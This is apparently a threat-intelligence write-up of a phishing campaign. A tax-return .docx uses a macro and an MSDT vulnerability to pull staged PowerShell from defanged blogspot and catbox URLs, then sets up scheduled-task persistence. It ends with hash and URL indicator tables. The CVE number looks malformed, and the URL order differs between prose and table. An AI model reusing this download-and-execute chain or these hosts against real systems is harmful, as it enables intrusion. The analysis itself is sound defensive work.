Initial Email
An email was discovered from comel[@]industry-mass[.]com. This site was created within the last 15 days.
The email was titled Tax return 2022 and contained a .docx file.
Opening this file initially looks like an actual tax return. I have redacted the private information from the screenshot
Behind the scenes, a macro runs that exploits the CVE-2022-301090 MSDT vulnerability.
Payload Stage 1: MSDT Vulnerability
The macro calls out to hxxps:\files[.]catbox[.]moe/sndoli[.]hta which contains obfuscated script.
When chained with the CVE-2022-301090 vuln, this becomes powershell that makes an IEX request to hxxps://powpowpowffs5[.]blogspot[.]com/atom.xml. This URL immediately 302 redirects to 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42.txt for the stage 2 powershell.
Payload Stage 2: Main Powershell
More obfuscation. The initial steps of the script kills several windows processes, it then saves the payload to C:\ProgramFiles\MEMEMAN\CypherDeptoggraphy.~+~ before decrypting to a ScheduledTask creation for the file C:\ProgramData\MEMEMAN\UpdateEscan.js.
Execution
The final payload was downloaded and executed within PowerShell around 2:17p 22 Mar. The payload was able to successfully copy itself & create additional files to the MEMEMAN dir. Next it cloned itself to the Windows startup directory and create the two scheduled tasks to maintain persistence.
Indicators
Hashes
SHA256 Hash | Description |
9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fed | SHA2 of initial .docx file |
dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473 | SHA2 of the .hta file |
a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3 | SHA2 of the master payload |
9c7aefd09d3939a04aa2e36e553881b3ffd88efe8fdda7121a80f37653606b0d | SHA2 of REALENGINEUPDATE.js, a persistence file spawned by the execution of the master payload |
6b4fb85973c337fd7cf1b272ab313557a2d256314ab599638fac3ba3d6e8ffb7 | SHA2 of UpdateEscan.js, a persistence file spawned by the execution of the master payload |
e7831599adde64042091b5db47032e3a3c3b2f7b8720156900b38f35ca2d8936 | SHA2 of WindowsDEFENDERUPDATE.js, a persistence file spawned by the execution of the master payload |
9b57c468f4df5bbedb75d0027348a2dd278e4d168b83a6e74c777d6737de0606 | SHA2 of CypherDeptography.~_~, a persistence file spawned by the execution of the master payload |
URLs
URL | Description |
urlcallinghta6[.]blogspot[.]com/atom[.]xml | 1st URL request from .docx file |
files[.]catbox[.]moe/sndoli[.]hta | 2nd URL that was the result of a 302 redirect from 1st URL. |
powpowpowffs5[.]blogspot[.]com/atom[.]xml | 3rd URL that was contacted from the decoded powershell code in sndoli.hta |
529f38d0-3744-4286-b484-be860d475d25[.]usrfiles.com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt | 4th URL that was the result of a 302 redirect from 3rd URL |
bakc2000[.]blogspot.com/atom[.]xml | URL used by one of the files for persistence, re |
backuphotelall[.]blogspot.com/atom[.]xml | URL used by one of the files for persistence |